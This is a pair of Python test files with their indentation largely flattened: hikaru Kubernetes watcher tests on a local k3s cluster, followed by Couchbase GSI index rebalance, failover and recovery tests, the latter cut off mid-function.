watch_rel_1_17.py
#
# Copyright (c) 2021 Incisive Technology Ltd
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from os import getcwd
from pathlib import Path
from threading import Thread
import time
from kubernetes import config
from hikaru import set_global_default_release, load_full_yaml
from hikaru.model.rel_1_17 import Pod, Namespace, ObjectMeta
from hikaru.watch import Watcher, MultiplexingWatcher, WatchEvent
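# These tests expect a reachable cluster; the kubeconfig path below is hard-coded for a local k3s install.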
set_global_default_release('rel_1_17')
config.load_kube_config(config_file="/etc/rancher/k3s/k3s.yaml")
cwd = getcwd()
if cwd.endswith('/e2e'):
# then we're running in the e2e directory itself
base_path = Path('../test_yaml')
else:
# assume we're running in the parent directory
base_path = Path('test_yaml')
del cwd
def test01():
"""
test01: simple watcher test; timeout after load
"""
w = Watcher(Pod, timeout_seconds=1)
count = 0
for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
        assert isinstance(we.obj, Pod), f'got a {type(we.obj).__name__}, not a Pod'
count += 1
assert count > 0, 'got no Pod events'
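# Helper: create and then delete a Namespace on a background thread, so the
# watcher under test sees the corresponding ADDED/MODIFIED/DELETED events.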
def make_namespace(name):
def do_it(nsname):
time.sleep(0.1)
ns = Namespace(metadata=ObjectMeta(name=nsname))
ns.create()
time.sleep(0.1)
ns.delete()
t = Thread(target=do_it, args=(name,))
t.start()
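# Helper: load a Pod spec from test_yaml/core-pod.yaml, rename it, then create
# and delete it in the given namespace on a background thread.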
def make_pod(name, nsname):
def do_it(podname, ns):
time.sleep(0.1)
path = base_path / "core-pod.yaml"
pod: Pod = load_full_yaml(path=str(path))[0]
pod.metadata.name = podname
pod.metadata.namespace = ns
pod.create()
time.sleep(0.1)
pod.delete()
t = Thread(target=do_it, args=(name, nsname))
t.start()
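# Helper: consume all pending events from the watcher and return the highest
# resourceVersion seen, so a follow-up watch only reports new events.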
def drain(w: Watcher) -> int:
highest_rv = 0
for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
rv = int(we.obj.metadata.resourceVersion)
if rv > highest_rv:
highest_rv = rv
return highest_rv
def test02():
"""
test02: watch for namespace events, create/delete a namespace
"""
w = Watcher(Namespace)
ns_name = "test02-watch"
highest_rv = drain(w)
w = Watcher(Namespace, resource_version=highest_rv)
make_namespace(ns_name)
for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
assert isinstance(we.obj, Namespace)
if we.obj.metadata.name == ns_name and we.etype == "DELETED":
w.stop()
def test03():
"""
test03: check we get all the events we expect for a create/delete
"""
w = Watcher(Namespace)
highest_rv = drain(w)
w.update_resource_version(highest_rv)
ns_name = 'test03-watcher'
expected_types = {'ADDED', 'MODIFIED', 'DELETED'}
make_namespace(ns_name)
seen_types = set()
for we in w.stream(manage_resource_version=True, quit_on_timeout=False):
assert isinstance(we.obj, Namespace)
if we.obj.metadata.name != ns_name:
continue
seen_types.add(we.etype)
if we.etype == 'DELETED':
w.stop()
assert expected_types == seen_types
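# Debug helper: print a one-line summary of a WatchEvent.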
def dump(we: WatchEvent):
print(f"e:{we.etype} t:{we.obj.kind} n:{we.obj.metadata.name} ns:"
f"{we.obj.metadata.namespace}")
def test04():
"""
test04: check basic mux operation
"""
ns_name = 'test04-watch'
podname = 'test04-pod'
nsw = Watcher(Namespace)
hns = drain(nsw)
nsw.update_resource_version(hns)
pw = Watcher(Pod, namespace=ns_name)
hp = drain(pw)
pw.update_resource_version(hp)
mux = MultiplexingWatcher()
mux.add_watcher(nsw)
mux.add_watcher(pw)
expected = {'ADDED', 'MODIFIED', 'DELETED'}
pod_seen = set()
ns_seen = set()
make_namespace(ns_name)
make_pod(podname, ns_name)
stopped_mux = False
for we in mux.stream(manage_resource_version=True, quit_on_timeout=False):
if we.obj.kind == 'Pod' and we.obj.metadata.namespace == ns_name:
pod_seen.add(we.etype)
elif we.obj.kind == 'Namespace' and we.obj.metadata.name == ns_name:
ns_seen.add(we.etype)
if 'DELETED' in pod_seen and 'DELETED' in ns_seen:
stopped_mux = True
mux.stop()
assert stopped_mux, "the mux exited via timeout or loss of watchers"
assert expected == ns_seen, f'Not enough namespace events: {expected-ns_seen}'
assert expected == pod_seen, f'Not enough pod events: {expected-pod_seen}'
def test05():
"""
test05: check adding a Watcher on the fly to the mux
"""
ns_name = 'test05-watch'
podname = 'test05-pod'
nsw = Watcher(Namespace)
hns = drain(nsw)
nsw.update_resource_version(hns)
pw = Watcher(Pod, namespace=ns_name)
hp = drain(pw)
pw.update_resource_version(hp)
mux = MultiplexingWatcher()
mux.add_watcher(nsw)
expected = {'ADDED', 'MODIFIED', 'DELETED'}
pod_seen = set()
ns_seen = set()
make_namespace(ns_name)
make_pod(podname, ns_name)
stopped_mux = False
first = True
for we in mux.stream(manage_resource_version=True, quit_on_timeout=False):
if first:
first = False
mux.add_watcher(pw)
if we.obj.kind == 'Pod' and we.obj.metadata.namespace == ns_name:
pod_seen.add(we.etype)
elif we.obj.kind == 'Namespace' and we.obj.metadata.name == ns_name:
ns_seen.add(we.etype)
if 'DELETED' in pod_seen and 'DELETED' in ns_seen:
stopped_mux = True
mux.stop()
assert stopped_mux, "the mux exited via timeout or loss of watchers"
assert expected == ns_seen, f'Not enough namespace events: {expected-ns_seen}'
assert expected == pod_seen, f'Not enough pod events: {expected-pod_seen}'
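# When run directly (outside a test runner), execute every test* function in turn.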
if __name__ == "__main__":
for k, v in dict(globals()).items():
if callable(v) and k.startswith('test'):
print(f'running {k}')
try:
v()
except Exception as e:
print(f'{k} failed with {e}')
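# Minimal usage sketch (not part of the tests), assuming the same cluster setup
# as above: drain a Watcher, resume from the highest resourceVersion seen, and
# dump new Pod events until the watch times out.
#
#   w = Watcher(Pod, timeout_seconds=5)
#   w.update_resource_version(drain(w))
#   for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
#       dump(we)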
gsi_rebalance_2i.py
from datetime import datetime
import random
import threading
from membase.api.rest_client import RestConnection, RestHelper
from queue import Queue
from lib import testconstants
from lib.couchbase_helper.query_definitions import SQLDefinitionGenerator, QueryDefinition, RANGE_SCAN_TEMPLATE
from lib.couchbase_helper.tuq_generators import TuqGenerators
from lib.remote.remote_util import RemoteMachineShellConnection
from pytests.fts.fts_base import NodeHelper
from pytests.query_tests_helper import QueryHelperTests
from .base_2i import BaseSecondaryIndexingTests, log
#class SecondaryIndexingRebalanceTests(BaseSecondaryIndexingTests, QueryHelperTests, NodeHelper,
# EnterpriseBackupRestoreBase):
class SecondaryIndexingRebalanceTests(BaseSecondaryIndexingTests, QueryHelperTests, NodeHelper):
#class SecondaryIndexingRebalanceTests(BaseSecondaryIndexingTests):
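    """
    Rebalance tests for GSI (secondary) indexes: swap rebalance, failover and
    recovery, cbindex move, and create/build/drop index or query/mutation
    activity while an index rebalance is in progress.
    """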
def setUp(self):
#super(SecondaryIndexingRebalanceTests, self).setUp()
super().setUp()
self.rest = RestConnection(self.servers[0])
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.create_primary_index = False
self.retry_time = self.input.param("retry_time", 300)
self.rebalance_out = self.input.param("rebalance_out", False)
self.sleep_time = self.input.param("sleep_time", 1)
self.num_retries = self.input.param("num_retries", 1)
self.build_index = self.input.param("build_index", False)
shell = RemoteMachineShellConnection(self.servers[0])
info = shell.extract_remote_info().type.lower()
if info == 'linux':
if self.nonroot:
nonroot_base_path = "/home/{0}".format(self.master.ssh_username)
self.cli_command_location = nonroot_base_path + \
testconstants.LINUX_COUCHBASE_BIN_PATH
else:
self.cli_command_location = testconstants.LINUX_COUCHBASE_BIN_PATH
elif info == 'windows':
self.cmd_ext = ".exe"
self.cli_command_location = testconstants.WIN_COUCHBASE_BIN_PATH_RAW
elif info == 'mac':
self.cli_command_location = testconstants.MAC_COUCHBASE_BIN_PATH
else:
raise Exception("OS not supported.")
self.rand = random.randint(1, 1000000000)
self.alter_index = self.input.param("alter_index", None)
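        # the ANSI join tests rely on the travel-sample bucket, so load it up front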
if self.ansi_join:
self.rest.load_sample("travel-sample")
def tearDown(self):
super(SecondaryIndexingRebalanceTests, self).tearDown()
def test_gsi_rebalance_out_indexer_node(self):
self.run_operation(phase="before")
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
self.run_operation(phase="after")
def test_gsi_rebalance_in_indexer_node(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# rebalance in a node
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [])
self.run_operation(phase="after")
def test_gsi_rebalance_swap_rebalance(self):
self.run_operation(phase="before")
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
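        # poll listRebalanceTokens (up to 20 tries, ~2s apart) for the rebalance token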
for i in range(20):
output = self.rest.list_indexer_rebalance_tokens(server=index_server)
if "rebalancetoken" in output:
log.info(output)
break
self.sleep(2)
if i == 19 and "rebalancetoken" not in output:
self.log.warning("rebalancetoken was not returned by /listRebalanceTokens during gsi rebalance")
self.run_async_index_operations(operation_type="query")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_after_rebalance_in(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_with_mutations_and_query(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
self.run_operation(phase="during")
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_create_index_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
index_name_prefix = "random_index_" + str(random.randint(100000, 999999))
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(4)
try:
# when rebalance is in progress, run create index
self.n1ql_helper.run_cbq_query(
query="CREATE INDEX " + index_name_prefix + " ON default(age) USING GSI WITH {'defer_build': True};",
server=self.n1ql_node)
except Exception as ex:
log.info(str(ex))
if "Create index or Alter replica cannot proceed due to rebalance in progress" not in str(ex):
self.fail("index creation did not fail with expected error : {0}".format(str(ex)))
else:
self.fail("index creation did not fail as expected")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
def test_drop_index_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(15)
try:
# when rebalance is in progress, run drop index
self._drop_index(self.query_definitions[0], self.buckets[0])
except Exception as ex:
log.info(str(ex))
if "Indexer Cannot Process Drop Index - Rebalance In Progress" not in str(ex):
self.fail("drop index did not fail with expected error : {0}".format(str(ex)))
else:
log.info("drop index did not fail, check if the index is dropped in the retry mechanism")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(120)
# Validate that the index is dropped after retry
try:
self._drop_index(self.query_definitions[0], self.buckets[0])
except Exception as ex:
log.info(str(ex))
if "not found" not in str(ex):
self.fail("drop index did not fail with expected error : {0}".format(str(ex)))
else:
self.fail("drop index did not fail, It should have as it would already have been deleted by retry")
def test_bucket_delete_and_flush_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# try deleting and flushing bucket during gsi rebalance
status1 = self.rest.delete_bucket(bucket=self.buckets[0])
if status1:
self.fail("deleting bucket succeeded during gsi rebalance")
try:
status2 = self.rest.flush_bucket(bucket=self.buckets[0])
except Exception as ex:
if "unable to flush bucket" not in str(ex):
self.fail("flushing bucket failed with unexpected error message")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_works_when_querying_is_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# start querying
t1 = threading.Thread(target=self.run_async_index_operations, args=("query",))
t1.start()
        # rebalance out an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_works_when_mutations_are_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# start kv mutations
results = []
tasks = self.async_run_doc_ops()
for task in tasks:
            # pass the bound method so result() is awaited on the worker thread rather than here
            results.append(threading.Thread(target=task.result))
for result in results:
result.start()
        # rebalance out an indexer node when kv mutations are in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
for result in results:
result.join()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_build_index_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
exceptions = self._build_index()
if not [x for x in exceptions if 'Indexer Cannot Process Build Index - Rebalance In Progress' in x]:
self.fail(
"build index did not fail during gsi rebalance with expected error message: See MB-23452 for more details")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.run_operation(phase="after")
def test_hard_failover_and_full_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=False)
failover_task.result()
self.sleep(30)
# do a full recovery and rebalance
add_back_ip = index_server.ip
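        # if the node address is a bracketed IPv6 literal, strip the brackets before building the otp node name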
if add_back_ip.startswith("["):
hostname = add_back_ip[add_back_ip.find("[") + 1:add_back_ip.find("]")]
add_back_ip = hostname
self.rest.set_recovery_type('ns_1@' + add_back_ip, "full")
self.rest.add_back_node('ns_1@' + add_back_ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_hard_failover_and_delta_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=False)
failover_task.result()
self.sleep(30)
# do a delta recovery and rebalance
self.rest.set_recovery_type('ns_1@' + index_server.ip, "delta")
self.rest.add_back_node('ns_1@' + index_server.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_hard_failover_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# failover the indexer node which had all the indexes
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=False)
failover_task.result()
self.sleep(30)
# rebalance out the indexer node
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init + 1], [], [index_server])
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, _ = self._return_maps()
self.assertEqual(len(list(map_after_rebalance.keys())), 0)
def test_graceful_failover_and_full_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=True)
failover_task.result()
self.sleep(240)
# do a full recovery and rebalance
self.rest.set_recovery_type('ns_1@' + index_server.ip, "full")
self.rest.add_back_node('ns_1@' + index_server.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_graceful_failover_and_delta_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=True)
failover_task.result()
self.sleep(120)
# do a delta recovery and rebalance
self.rest.set_recovery_type('ns_1@' + index_server.ip, "delta")
self.rest.add_back_node('ns_1@' + index_server.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_gsi_rebalance_works_with_mutations_query_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
        # rebalance out an indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
# start kv mutations and query in parallel
results = []
tasks = self.async_run_doc_ops()
for task in tasks:
            # pass the bound method so result() is awaited on the worker thread rather than here
            results.append(threading.Thread(target=task.result))
for result in results:
result.start()
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
for result in results:
result.join()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_stop_rebalance_and_start_again(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
        # rebalance out an indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
# stop the rebalance
stopped = RestConnection(self.master).stop_rebalance(wait_timeout=self.wait_timeout // 3)
self.assertTrue(stopped, msg="unable to stop rebalance")
rebalance.result()
# start rebalance again
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(30)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_verify_gsi_rebalance_does_not_work_during_create_drop_and_build_index(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.sleep(30)
services_in = ["index"]
self.run_operation(phase="before")
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]],
[],
services=services_in)
rebalance.result()
tasks = self.async_run_doc_ops()
self.sleep(60)
# start create index, build index and drop index
# self._build_index(sleep=0)
for task in tasks:
task.result()
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(address) USING GSI WITH {'num_replica': 1}"
